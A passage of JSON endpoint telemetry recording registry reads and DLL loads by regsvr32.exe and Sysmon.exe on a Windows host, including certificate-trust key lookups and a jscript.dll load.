"{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - 
"process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "ncryptsslp.dll", - "image_path": "C:\\Windows\\System32\\ncryptsslp.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573239170000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "clbcatq.dll", - "image_path": "C:\\Windows\\System32\\clbcatq.dll", - "pid": 2012, - 
"process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573240110000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "wldp.dll", - "image_path": "C:\\Windows\\System32\\wldp.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573240110000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573240110000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573240270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", 
- "timestamp": 131883573240270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "userenv.dll", - "image_path": "C:\\Windows\\System32\\userenv.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573240270000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "version.dll", - "image_path": "C:\\Windows\\System32\\version.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573240430000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "shell32.dll", - "image_path": "C:\\Windows\\System32\\shell32.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573240430000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573240430000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "mpr.dll", - "image_path": "C:\\Windows\\System32\\mpr.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573240430000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "sxs.dll", - "image_path": "C:\\Windows\\System32\\sxs.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573240580000, - "unique_pid": 
"{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "gpapi.dll", - "image_path": "C:\\Windows\\System32\\gpapi.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573240580000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573240580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", 
- "registry_value": "Certificates", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "OneCoreUAPCommonProxyStub.dll", - "image_path": "C:\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", - "registry_value": "NameSpace", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", - "registry_value": "NameSpace", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace\\DelegateFolders", - "registry_value": "DelegateFolders", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "jscript.dll", - "image_path": "C:\\Windows\\System32\\jscript.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573240270000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 
131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": 
"CRLs", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 